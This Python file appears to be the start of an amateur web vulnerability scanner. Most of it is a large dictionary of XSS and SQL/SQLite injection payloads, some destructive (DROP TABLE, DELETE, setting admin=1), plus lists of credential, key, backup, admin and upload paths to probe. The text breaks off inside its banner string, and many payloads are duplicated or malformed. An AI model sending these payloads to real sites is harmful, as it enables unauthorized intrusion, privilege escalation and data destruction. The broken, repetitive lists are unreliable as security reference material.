import requests
from colorama import init, Fore, Style
import time
import json
import os
import pystyle 
import subprocess
pc_username = os.getlogin()
r = Fore.RED
b = Fore.BLUE
y = Fore.YELLOW

def menu():
    subprocess.run(["python", "main.py"])

vulnerable_endpoints = {
    "XSS": [
        "/<script>alert('XSS')</script>",
        "/%3Cscript%3Ealert('XSS')%3C/script%3E",
        "/<img src=\"x\" onerror=\"alert('XSS')\">",
        "/<svg onload=\"alert('XSS')\"></svg>",
        "/<script>alert`XSS`</script>",
        "/<img src=x onerror=alert('XSS')>",
        "/<svg onload=alert('XSS')></svg>",
        "/<script>alert(String.fromCharCode(88,83,83))</script>",
        "/<img src=x onerror=alert(String.fromCharCode(88,83,83))>",
        "/<svg onload=alert(String.fromCharCode(88,83,83))></svg>",
        "/<script>alert(/XSS/)</script>",
        "/<img src=x onerror=alert(/XSS/)>",
        "/<svg onload=alert(/XSS/)></svg>",
        "/<script>console.log('XSS')</script>",
        "/<img src=x onerror=console.log('XSS')>",
        "/<svg onload=console.log('XSS')></svg>",
        "/<script>eval('alert(\"XSS\")')</script>",
        "/<img src=x onerror=eval('alert(\"XSS\")')>",
        "/<svg onload=eval('alert(\"XSS\")')></svg>",
        "/<script>setTimeout(\"alert('XSS')\",1000)</script>",
        "/<img src=x onerror=setTimeout(\"alert('XSS')\",1000)>",
        "/<svg onload=setTimeout(\"alert('XSS')\",1000)></svg>",
        "/<script>confirm('XSS')</script>",
        "/<img src=x onerror=confirm('XSS')>",
        "/<svg onload=confirm('XSS')></svg>",
        "/<script>prompt('XSS')</script>",
        "/<img src=x onerror=prompt('XSS')>",
        "/<svg onload=prompt('XSS')></svg>",
        "/<script>document.write('XSS')</script>",
        "/<img src=x onerror=document.write('XSS')>",
        "/<svg onload=document.write('XSS')></svg>"
    ],


    "SQL Injection": [
        "/?id=1' OR '1'='1",
        "/?id=1; DROP TABLE users",
        "/?id=1 UNION SELECT * FROM users",
        "/?id=1' OR 1=1 UNION SELECT * FROM users",
        "/?id=1' OR '1'='1' UNION SELECT * FROM users",
        "/?id=1; SELECT * FROM users",
        "/?id=1' OR '1'='1'; SELECT * FROM users",
        "/?id=1' OR 1=1; SELECT * FROM users",
        "/?id=1' OR '1'='1'; SELECT * FROM users",
        "/?id=1; UPDATE users SET admin=1 WHERE id=1",
        "/?id=1' OR '1'='1'; UPDATE users SET admin=1 WHERE id=1",
        "/?id=1' OR 1=1; UPDATE users SET admin=1 WHERE id=1",
        "/?id=1' OR '1'='1'; UPDATE users SET admin=1 WHERE id=1",
        "/?id=1; DELETE FROM users WHERE id=1",
        "/?id=1' OR '1'='1'; DELETE FROM users WHERE id=1",
        "/?id=1' OR 1=1; DELETE FROM users WHERE id=1",
        "/?id=1' OR '1'='1'; DELETE FROM users WHERE id=1",
        "/?id=1; INSERT INTO users (username, password) VALUES ('admin', 'password')",
        "/?id=1' OR '1'='1'; INSERT INTO users (username, password) VALUES ('admin', 'password')",
        "/?id=1' OR 1=1; INSERT INTO users (username, password) VALUES ('admin', 'password')",
        "/?id=1' OR '1'='1'; INSERT INTO users (username, password) VALUES ('admin', 'password')",
        "/?id=1; SELECT * FROM information_schema.tables",
        "/?id=1' OR '1'='1'; SELECT * FROM information_schema.tables",
        "/?id=1' OR 1=1; SELECT * FROM information_schema.tables",
        "/?id=1' OR '1'='1'; SELECT * FROM information_schema.tables",
        "/?id=1; SELECT * FROM information_schema.columns",
        "/?id=1' OR '1'='1'; SELECT * FROM information_schema.columns",
        "/?id=1' OR 1=1; SELECT * FROM information_schema.columns",
        "/?id=1' OR '1'='1'; SELECT * FROM information_schema.columns"
    ],


    "Insecure Direct Object References": [
        "/users/1",
        "/users/2",
        "/admin/3",
        "/profile/4",
        "/documents/5",
        "/posts/6",
        "/products/7",
        "/files/8",
        "/invoices/9",
        "/images/10",
        "/videos/11",
        "/orders/12",
        "/assets/13",
        "/logs/14",
        "/settings/15",
        "/reports/16",
        "/messages/17",
        "/tickets/18",
        "/notes/19",
        "/payments/20",
        "/attachments/21",
        "/comments/22",
        "/archives/23",
        "/categories/24",
        "/downloads/25",
        "/notifications/26",
        "/widgets/27",
        "/backups/28",
        "/thumbnails/29",
        "/resources/30"
    ],


    "Information Disclosure": [
        "/config.php",
        "/admin/backup.sql",
        "/config.ini",
        "/admin/credentials.txt",
        "/logs/access.log",
        "/admin/config.xml",
        "/database/credentials.sql",
        "/backup/credentials.json",
        "/admin/secrets.yaml",
        "/logs/error.log",
        "/admin/config.json",
        "/database/schema.sql",
        "/backup/secrets.txt",
        "/admin/keys.pem",
        "/logs/debug.log",
        "/admin/config.yaml",
        "/database/data.csv",
        "/backup/database.sql",
        "/admin/secrets.xml",
        "/logs/system.log",
        "/admin/config.ini",
        "/database/config.json",
        "/backup/admin.txt",
        "/admin/keys.txt",
        "/logs/application.log",
        "/admin/config.xml.bak",
        "/database/credentials.ini",
        "/backup/secrets.json",
        "/admin/config.json.bak",
        "/logs/debug.txt",
        "/admin/config.yaml.bak"
    ],


    "Insecure Cryptographic Storage": [
    "/passwords.txt",
    "/encrypted_data",
    "/credentials.db",
    "/private.key",
    "/config.ini",
    "/secrets.json",
    "/key.pem",
    "/certificate.crt",
    "/backup.zip",
    "/access.log",
    "/credentials.yaml",
    "/passwords.bak",
    "/encryption.key",
    "/database.bak",
    "/secrets.yaml",
    "/config.xml",
    "/rsa_private.key",
    "/aes_encrypted_data.bin",
    "/private_certificate.pfx",
    "/passwords.enc",
    "/credentials.sql",
    "/secret_key.txt",
    "/database.sql",
    "/rsa_keypair.pem",
    "/encrypted_config.ini",
    "/secrets.db",
    "/credentials.json",
    "/key.enc",
    "/backup.sql",
    "/access.db",
    "/passwords.yaml",
    "/encryption_config.xml",
    "/database.json",
    "/private_key.pem",
    "/ssl_certificate.key",
    "/backup.tar.gz",
    "/credentials.enc",
    "/secret_data.xml",
    "/config.bak",
    "/credentials.yaml",
    "/key.pem.enc",
    "/backup.log",
    "/access.yaml",
    "/passwords.sql",
    "/encryption_keys.json",
    "/database.enc",
    "/secrets.yaml",
    "/config.ini.bak",
    "/rsa_private.pem",
    "/aes_encrypted_file.dat",
    "/private_certificate.key",
    "/passwords.zip",
    "/credentials.sql",
    "/secret_key.bak",
    "/database.sql.bak",
    "/rsa_keypair.bak",
    "/encrypted_config.xml",
    "/secrets.bak",
    "/credentials.json.bak",
    "/key.enc.bak",
    "/backup.sql.bak",
    "/access.db.bak",
    "/passwords.yaml.bak",
    "/encryption_config.xml.bak",
    "/database.json.bak",
    "/private_key.pem.bak",
    "/ssl_certificate.key.bak",
    "/backup.tar.gz.bak",
    "/credentials.enc.bak",
    "/secret_data.xml.bak",
    "/config.bak.bak",
    "/credentials.yaml.bak",
    "/key.pem.enc.bak",
    "/backup.log.bak",
    "/access.yaml.bak",
    "/passwords.sql.bak",
    "/encryption_keys.json.bak",
    "/database.enc.bak",
    "/secrets.yaml.bak",
    "/config.ini.bak.bak",
    "/rsa_private.pem.bak",
    "/aes_encrypted_file.dat.bak",
    "/private_certificate.key.bak",
    "/passwords.zip.bak",
    "/credentials.sql.bak",
    "/secret_key.bak.bak",
    "/database.sql.bak.bak",
    "/rsa_keypair.bak.bak",
    "/encrypted_config.xml.bak",
    ],



    "Unvalidated Input": [
    "/search?query=<script>alert('XSS')</script>",
    "/search?query=SELECT * FROM users",
    "/search?query=<img src='x' onerror='alert(1)'>",
    "/search?query=<a href='javascript:alert(1)'>Click me</a>",
    "/search?query=<svg/onload=alert('XSS')>",
    "/search?query=<input type='image' src='x' onerror='alert(1)'>",
    "/search?query=<marquee onstart='alert(1)'>",
    "/search?query=<object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>",
    "/search?query=<iframe src='javascript:alert(1)'>",
    "/search?query=<video><source onerror='javascript:alert(1)'>",
    "/search?query=<body/onload=alert('XSS')>",
    "/search?query=<img src=x onerror=alert('XSS')>",
    "/search?query=<img src='x' onerror='javascript:alert(1)'>",
    "/search?query=<img src=1 onerror=alert('XSS')>",
    "/search?query=<img src='x' onerror='alert(String.fromCharCode(88,83,83))'>",
    "/search?query=<img src=x onerror=alert(String.fromCharCode(88,83,83))>",
    "/search?query=<img src=x onerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerrorrror=alert(1)'>",
    "/search?query=<img src=x:alert(alt) onerror=eval(src) alt=xss>",
    "/search?query=<img src=x oneonerrorrror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x:alert(alt) onerror=eval(src) alt=xss>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror='alert(1)'>",
    "/search?query=<img src=x oneonerror='alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>",
    "/search?query=<img src=x oneonerror=alert(/XSS/)'>"
    ],


    "Broken Authentication and Session Management": [
    "/robots",
    "/robot",
    "/sitemap",
    "/robots.txt",
    "/sitemap.xml",
    "/login",
    "/session",
    "/logout",
    "/signin",
    "/authenticate",
    "/signout",
    "/admin",
    "/dashboard",
    "/account",
    "/profile",
    "/user",
    "/signin.php",
    "/authenticate.php",
    "/signout.php",
    "/admin.php",
    "/dashboard.php",
    "/account.php",
    "/profile.php",
    "/user.php",
    "/login.jsp",
    "/authenticate.jsp",
    "/signout.jsp",
    "/admin.jsp",
    "/dashboard.jsp",
    "/account.jsp",
    "/profile.jsp",
    "/user.jsp",
    "/login.aspx",
    "/authenticate.aspx",
    "/signout.aspx",
    "/admin.aspx",
    "/dashboard.aspx",
    "/account.aspx",
    "/profile.aspx",
    "/user.aspx",
    "/login.asp",
    "/authenticate.asp",
    "/signout.asp",
    "/admin.asp",
    "/dashboard.asp",
    "/account.asp",
    "/profile.asp",
    "/user.asp",
    "/login.py",
    "/authenticate.py",
    "/signout.py",
    "/admin.py",
    "/dashboard.py",
    "/account.py",
    "/profile.py",
    "/user.py",
    "/login.rb",
    "/authenticate.rb",
    "/signout.rb",
    "/admin.rb",
    "/dashboard.rb",
    "/account.rb",
    "/profile.rb",
    "/user.rb",
    "/login.pl",
    "/authenticate.pl",
    "/signout.pl",
    "/admin.pl",
    "/dashboard.pl",
    "/account.pl",
    "/profile.pl",
    "/user.pl",
    "/login.cgi",
    "/authenticate.cgi",
    "/signout.cgi",
    "/admin.cgi",
    "/dashboard.cgi",
    "/account.cgi",
    "/profile.cgi",
    "/user.cgi",
    "/login.js",
    "/authenticate.js",
    "/signout.js",
    "/admin.js",
    "/dashboard.js",
    "/account.js",
    "/profile.js",
    "/user.js",
    "/login.aspx.cs",
    "/authenticate.aspx.cs",
    "/signout.aspx.cs",
    "/admin.aspx.cs",
    "/dashboard.aspx.cs",
    "/account.aspx.cs",
    "/profile.aspx.cs",
    "/user.aspx.cs",
    "/login.php",
    "/authenticate.php",
    "/signout.php",
    "/admin.php",
    "/dashboard.php",
    "/account.php",
    "/profile.php",
    "/user.php"
    ],



    "Unprotected File Upload": [
    "/upload.php",
    "/upload",
    "/file_upload",
    "/upload_handler.php",
    "/upload_file",
    "/file_upload_handler",
    "/file.php",
    "/file_upload.php",
    "/upload_document.php",
    "/upload_image",
    "/file_upload_script",
    "/file_upload_handler.php",
    "/upload_document",
    "/upload_image.php",
    "/file_upload_handler.php",
    "/upload_document_handler",
    "/upload_image_handler.php",
    "/file_upload_script.php",
    "/upload_file.php",
    "/upload_handler",
    "/file_upload_handler_script.php",
    "/upload_document.php",
    "/upload_image_script",
    "/file_upload.php",
    "/upload_file_handler.php",
    "/upload_handler_script.php",
    "/file_upload_handler_script",
    "/upload_document_script.php",
    "/upload_image_handler",
    "/file_upload_document.php",
    "/upload.php",
    "/upload_handler.php",
    "/file_upload_script.php",
    "/upload_file_script",
    "/upload_handler_script",
    "/file_upload_handler.php",
    "/upload_document_handler.php",
    "/upload_image.php",
    "/file_upload_handler_script.php",
    "/upload_document_script",
    "/upload_image_handler.php",
    "/file_upload.php",
    "/upload_file_handler",
    "/upload_handler_script.php",
    "/file_upload_script.php",
    "/upload_document.php",
    "/upload_image_script.php",
    "/file_upload_handler",
    "/upload_document_handler_script.php",
    "/upload_image_handler_script",
    "/file_upload_script",
    "/upload_file.php",
    "/upload_handler",
    "/file_upload_handler_script",
    "/upload_document_script.php",
    "/upload_image.php",
    "/file_upload.php",
    "/upload_file_handler.php",
    "/upload_handler_script.php",
    "/file_upload_handler",
    "/upload_document_handler.php",
    "/upload_image_script.php",
    "/file_upload_script.php",
    "/upload_file_script.php",
    "/upload_handler.php",
    "/file_upload_handler_script.php",
    "/upload_document_script",
    "/upload_image_handler.php",
    "/file_upload.php",
    "/upload_file_handler",
    "/upload_handler_script.php",
    "/file_upload_script.php",
    "/upload_document.php",
    "/upload_image_script.php",
    "/file_upload_handler",
    "/upload_document_handler_script.php",
    "/upload_image_handler_script",
    "/file_upload_script",
    "/upload_file.php",
    "/upload_handler",
    "/file_upload_handler_script",
    "/upload_document_script.php",
    "/upload_image.php",
    "/file_upload.php",
    "/upload_file_handler.php",
    "/upload_handler_script.php",
    "/file_upload_handler",
    "/upload_document_handler.php",
    "/upload_image_script.php"
    ],



    "CSS Vulnerability": [
    "/style.css",
    "/assets/style.css",
    "/theme.css",
    "/assets/theme.css",
    "/main.css",
    "/assets/main.css",
    "/custom.css",
    "/assets/custom.css",
    "/responsive.css",
    "/assets/responsive.css",
    "/print.css",
    "/assets/print.css",
    "/bootstrap.css",
    "/assets/bootstrap.css",
    "/normalize.css",
    "/assets/normalize.css",
    "/font-awesome.css",
    "/assets/font-awesome.css",
    "/animate.css",
    "/assets/animate.css",
    "/slick.css",
    "/assets/slick.css",
    "/bulma.css",
    "/assets/bulma.css",
    "/tailwind.css",
    "/assets/tailwind.css",
    "/foundation.css",
    "/assets/foundation.css",
    "/semantic-ui.css",
    "/assets/semantic-ui.css",
    "/pure.css",
    "/assets/pure.css",
    "/materialize.css",
    "/assets/materialize.css",
    "/uikit.css",
    "/assets/uikit.css",
    "/spectre.css",
    "/assets/spectre.css",
    "/milligram.css",
    "/assets/milligram.css",
    "/chota.css",
    "/assets/chota.css",
    "/skeleton.css",
    "/assets/skeleton.css",
    "/primer.css",
    "/assets/primer.css",
    "/mini.css",
    "/assets/mini.css",
    "/candy.css",
    "/assets/candy.css",
    "/govuk.css",
    "/assets/govuk.css",
    "/tachyons.css",
    "/assets/tachyons.css",
    "/rscss.css",
    "/assets/rscss.css",
    "/acss.css",
    "/assets/acss.css",
    "/susy.css",
    "/assets/susy.css",
    "/mvp.css",
    "/assets/mvp.css",
    "/lost.css",
    "/assets/lost.css",
    "/typebase.css",
    "/assets/typebase.css",
    "/css-blocks.css",
    "/assets/css-blocks.css",
    "/basscss.css",
    "/assets/basscss.css",
    "/cyborg.css",
    "/assets/cyborg.css",
    "/darkly.css",
    "/assets/darkly.css",
    "/flatly.css",
    "/assets/flatly.css",
    "/journal.css",
    "/assets/journal.css",
    "/litera.css",
    "/assets/litera.css",
    "/lumen.css",
    "/assets/lumen.css",
    "/lux.css",
    "/assets/lux.css",
    "/materia.css",
    "/assets/materia.css",
    "/minty.css",
    "/assets/minty.css",
    "/pulse.css",
    "/assets/pulse.css",
    "/sandstone.css",
    "/assets/sandstone.css",
    "/simplex.css",
    "/assets/simplex.css",
    "/slate.css",
    "/assets/slate.css",
    "/solar.css",
    "/assets/solar.css",
    "/spacelab.css",
    "/assets/spacelab.css",
    "/superhero.css",
    "/assets/superhero.css",
    "/united.css",
    "/assets/united.css",
    "/yeti.css",
    "/assets/yeti.css",
    "/cerulean.css",
    "/assets/cerulean.css",
    "/cosmo.css",
    "/assets/cosmo.css",
    "/cyborg.css",
    "/assets/cyborg.css",
    "/darkly.css",
    "/assets/darkly.css",
    "/flatly.css",
    "/assets/flatly.css",
    "/journal.css",
    "/assets/journal.css",
    "/litera.css",
    "/assets/litera.css",
    "/lumen.css",
    "/assets/lumen.css",
    "/lux.css",
    "/assets/lux.css",
    "/materia.css",
    "/assets/materia.css",
    "/minty.css",
    "/assets/minty.css",
    "/pulse.css",
    "/assets/pulse.css",
    "/sandstone.css",
    "/assets/sandstone.css",
    "/simplex.css",
    "/assets/simplex.css",
    "/slate.css",
    "/assets/slate.css",
    "/solar.css",
    "/assets/solar.css",
    "/spacelab.css",
    "/assets/spacelab.css",
    "/superhero.css",
    "/assets/superhero.css",
    "/united.css",
    "/assets/united.css",
    "/yeti.css",
    "/assets/yeti.css"
    ],



    "JavaScript Vulnerability": [
    "/script.js",
    "/assets/script.js",
    "/jquery.js",
    "/assets/jquery.js",
    "/angular.js",
    "/assets/angular.js",
    "/bootstrap.js",
    "/assets/bootstrap.js",
    "/underscore.js",
    "/assets/underscore.js",
    "/backbone.js",
    "/assets/backbone.js",
    "/ember.js",
    "/assets/ember.js",
    "/react.js",
    "/assets/react.js",
    "/vue.js",
    "/assets/vue.js",
    "/d3.js",
    "/assets/d3.js",
    "/moment.js",
    "/assets/moment.js",
    "/lodash.js",
    "/assets/lodash.js",
    "/handlebars.js",
    "/assets/handlebars.js",
    "/require.js",
    "/assets/require.js",
    "/zepto.js",
    "/assets/zepto.js",
    "/mootools.js",
    "/assets/mootools.js",
    "/knockout.js",
    "/assets/knockout.js",
    "/yui.js",
    "/assets/yui.js",
    "/prototype.js",
    "/assets/prototype.js",
    "/polymer.js",
    "/assets/polymer.js",
    "/mithril.js",
    "/assets/mithril.js",
    "/parcel.js",
    "/assets/parcel.js",
    "/riot.js",
    "/assets/riot.js",
    "/svelte.js",
    "/assets/svelte.js",
    "/stimulus.js",
    "/assets/stimulus.js",
    "/three.js",
    "/assets/three.js",
    "/jss.js",
    "/assets/jss.js",
    "/chart.js",
    "/assets/chart.js",
    "/paper.js",
    "/assets/paper.js",
    "/hammer.js",
    "/assets/hammer.js",
    "/codemirror.js",
    "/assets/codemirror.js",
    "/raphael.js",
    "/assets/raphael.js",
    "/modernizr.js",
    "/assets/modernizr.js",
    "/preact.js",
    "/assets/preact.js",
    "/fabric.js",
    "/assets/fabric.js",
    "/popper.js",
    "/assets/popper.js",
    "/babylon.js",
    "/assets/babylon.js",
    "/tween.js",
    "/assets/tween.js",
    "/quill.js",
    "/assets/quill.js",
    "/recoil.js",
    "/assets/recoil.js",
    "/axios.js",
    "/assets/axios.js",
    "/fuse.js",
    "/assets/fuse.js",
    "/immutable.js",
    "/assets/immutable.js",
    "/plyr.js",
    "/assets/plyr.js",
    "/video.js",
    "/assets/video.js",
    "/gridsome.js",
    "/assets/gridsome.js",
    "/next.js",
    "/assets/next.js",
    "/nestjs.js",
    "/assets/nestjs.js",
    "/sapper.js",
    "/assets/sapper.js",
    "/gatsby.js",
    "/assets/gatsby.js",
    "/swell.js",
    "/assets/swell.js",
    "/ionic.js",
    "/assets/ionic.js",
    "/nuxt.js",
    "/assets/nuxt.js",
    "/react-native.js",
    "/assets/react-native.js",
    "/stencil.js",
    "/assets/stencil.js",
    "/vue-native.js",
    "/assets/vue-native.js",
    "/node.js",
    "/assets/node.js",
    "/express.js",
    "/assets/express.js",
    "/koa.js",
    "/assets/koa.js",
    "/hapi.js",
    "/assets/hapi.js",
    "/sails.js",
    "/assets/sails.js",
    "/loopback.js",
    "/assets/loopback.js",
    "/meteor.js",
    "/assets/meteor.js",
    "/adonis.js",
    "/assets/adonis.js",
    "/feathers.js",
    "/assets/feathers.js",
    "/derby.js",
    "/assets/derby.js",
    "/mean.js",
    "/assets/mean.js",
    "/amp.js",
    "/assets/amp.js",
    "/vuepress.js",
    "/assets/vuepress.js",
    "/docz.js",
    "/assets/docz.js",
    "/storybook.js",
    "/assets/storybook.js",
    "/react-styleguidist.js",
    "/assets/react-styleguidist.js",
    "/grapes.js",
    "/assets/grapes.js",
    "/ember-cli.js",
    "/assets/ember-cli.js",
    "/angular-cli.js",
    "/assets/angular-cli.js",
    "/vue-cli.js",
    "/assets/vue-cli.js",
    "/create-react-app.js",
    "/assets/create-react-app.js"
    ],


    "SQLite Injection": [
    "/users'; SELECT * FROM users; --",
    "/users'; DROP TABLE users; --",
    "/products'; SELECT * FROM products; --",
    "/products'; DELETE FROM products; --",
    "/orders'; SELECT * FROM orders; --",
    "/orders'; UPDATE orders SET status = 'completed'; --",
    "/categories'; SELECT * FROM categories; --",
    "/categories'; INSERT INTO categories (name) VALUES ('New Category'); --",
    "/customers'; SELECT * FROM customers; --",
    "/customers'; UPDATE customers SET email = 'newemail@example.com'; --",
    "/invoices'; SELECT * FROM invoices; --",
    "/invoices'; DELETE FROM invoices; --",
    "/suppliers'; SELECT * FROM suppliers; --",
    "/suppliers'; INSERT INTO suppliers (name) VALUES ('New Supplier'); --",
    "/employees'; SELECT * FROM employees; --",
    "/employees'; UPDATE employees SET salary = 100000; --",
    "/orders'; SELECT * FROM orders WHERE status = 'pending'; --",
    "/orders'; DELETE FROM orders WHERE status = 'completed'; --",
    "/products'; SELECT * FROM products WHERE price > 100; --",
    "/products'; UPDATE products SET price = price + 10; --",
    "/customers'; SELECT * FROM customers WHERE country = 'USA'; --",
    "/customers'; UPDATE customers SET address = 'New Address' WHERE country = 'USA'; --",
    "/categories'; SELECT * FROM categories WHERE parent_id IS NULL; --",
    "/categories'; DELETE FROM categories WHERE parent_id IS NOT NULL; --",
    "/suppliers'; SELECT * FROM suppliers WHERE city = 'New York'; --",
    "/suppliers'; UPDATE suppliers SET contact = 'John Doe' WHERE city = 'New York'; --",
    "/employees'; SELECT * FROM employees WHERE department = 'Sales'; --",
    "/employees'; UPDATE employees SET manager = 'John Smith' WHERE department = 'Sales'; --",
    "/orders'; SELECT * FROM orders ORDER BY total_amount DESC; --",
    "/orders'; DELETE FROM orders ORDER BY created_at ASC; --",
    "/products'; SELECT * FROM products LIMIT 10; --",
    "/products'; UPDATE products SET stock = stock - 1 LIMIT 10; --",
    "/customers'; SELECT * FROM customers OFFSET 100; --",
    "/customers'; UPDATE customers SET discount = discount + 5 OFFSET 100; --",
    "/invoices'; SELECT * FROM invoices UNION SELECT * FROM archived_invoices; --",
    "/invoices'; DELETE FROM invoices UNION SELECT * FROM archived_invoices; --",
    "/suppliers'; SELECT * FROM suppliers JOIN products ON suppliers.id = products.supplier_id; --",
    "/suppliers'; DELETE FROM suppliers JOIN products ON suppliers.id = products.supplier_id; --",
    "/orders'; SELECT * FROM orders WHERE created_at >= '2022-01-01' AND created_at < '2022-02-01'; --",
    "/orders'; DELETE FROM orders WHERE created_at >= '2022-01-01' AND created_at < '2022-02-01'; --",
    "/products'; SELECT * FROM products WHERE name LIKE '%apple%'; --",
    "/products'; UPDATE products SET price = price * 1.1 WHERE name LIKE '%apple%'; --",
    "/customers'; SELECT * FROM customers WHERE email LIKE '%gmail.com'; --",
    "/customers'; UPDATE customers SET address = 'New Address' WHERE email LIKE '%gmail.com'; --",
    "/categories'; SELECT * FROM categories WHERE name IN ('Electronics', 'Furniture'); --",
    "/categories'; DELETE FROM categories WHERE name IN ('Electronics', 'Furniture'); --",
    "/suppliers'; SELECT * FROM suppliers WHERE country NOT IN ('USA', 'UK'); --",
    "/suppliers'; UPDATE suppliers SET contact = 'John Doe' WHERE country NOT IN ('USA', 'UK'); --",
    "/employees'; SELECT * FROM employees WHERE salary BETWEEN 50000 AND 100000; --",
    "/employees'; UPDATE employees SET bonus = salary * 0.1 WHERE salary BETWEEN 50000 AND 100000; --",
    "/orders'; SELECT * FROM orders GROUP BY status; --",
    "/orders'; DELETE FROM orders GROUP BY status; --",
    "/products'; SELECT * FROM products HAVING stock < 10; --",
    "/products'; UPDATE products SET price = price * 0.9 HAVING stock < 10; --",
    "/customers'; SELECT * FROM customers ORDER BY created_at DESC; --",
    "/customers'; UPDATE customers SET discount = 20 ORDER BY created_at DESC; --",
    "/invoices'; SELECT * FROM invoices LIMIT 10 OFFSET 20; --",
    "/invoices'; DELETE FROM invoices LIMIT 10 OFFSET 20; --",
    "/suppliers'; SELECT * FROM suppliers UNION ALL SELECT * FROM new_suppliers; --",
    "/suppliers'; DELETE FROM suppliers UNION ALL SELECT * FROM new_suppliers; --",
    "/employees'; SELECT * FROM employees JOIN departments ON employees.department_id = departments.id; --",
    "/employees'; DELETE FROM employees JOIN departments ON employees.department_id = departments.id; --",
    "/orders'; SELECT * FROM orders LEFT JOIN customers ON orders.customer_id = customers.id; --",
    "/orders'; DELETE FROM orders LEFT JOIN customers ON orders.customer_id = customers.id; --",
    "/products'; SELECT * FROM products RIGHT JOIN suppliers ON products.supplier_id = suppliers.id; --",
    "/products'; UPDATE products SET price = price * 1.2 RIGHT JOIN suppliers ON products.supplier_id = suppliers.id; --",
    "/customers'; SELECT * FROM customers CROSS JOIN countries; --",
    "/customers'; UPDATE customers SET discount = discount + 5 CROSS JOIN countries; --",
    "/invoices'; SELECT * FROM invoices WHERE DATE(created_at) = '2022-01-01'; --",
    "/invoices'; DELETE FROM invoices WHERE DATE(created_at) = '2022-01-01'; --",
    "/suppliers'; SELECT * FROM suppliers WHERE TIME(created_at) < '12:00:00'; --",
    "/suppliers'; UPDATE suppliers SET contact = 'John Doe' WHERE TIME(created_at) < '12:00:00'; --",
    "/employees'; SELECT * FROM employees WHERE datetime(created_at) > '2022-01-01 00:00:00'; --",
    "/employees'; UPDATE employees SET salary = salary * 1.1 WHERE datetime(created_at) > '2022-01-01 00:00:00'; --",
    "/orders'; SELECT * FROM orders WHERE strftime('%Y', created_at) = '2022'; --",
    "/orders'; DELETE FROM orders WHERE strftime('%Y', created_at) = '2022'; --",
    "/products'; SELECT * FROM products WHERE CAST(price AS TEXT) LIKE '%.99'; --",
    "/products'; UPDATE products SET price = price * 0.9 WHERE CAST(price AS TEXT) LIKE '%.99'; --",
    "/customers'; SELECT * FROM customers WHERE CAST(discount AS INTEGER) > 10; --",
    "/customers'; UPDATE customers SET discount = discount + 5 WHERE CAST(discount AS INTEGER) > 10; --",
    "/invoices'; SELECT * FROM invoices WHERE RANDOM() < 0.5; --",
    "/invoices'; DELETE FROM invoices WHERE RANDOM() < 0.5; --"
    ]
}


logo = r + f'''
           ███████╗███╗   ██╗███████╗███████╗██████╗ 
           ██╔════╝████╗  ██║██╔════╝██╔════╝██╔══██╗│Version : 1.0
           █████╗  ██╔██╗ ██║█████╗  █████╗  ██████╔╝├─────────────
           ██╔══╝  ██║╚██╗██║██╔══╝  ██╔══╝  ██╔══██╗│{pc_username}\'s PC
           ███████╗██║ ╚████║██║     ███████╗██║  ██║├─────────────
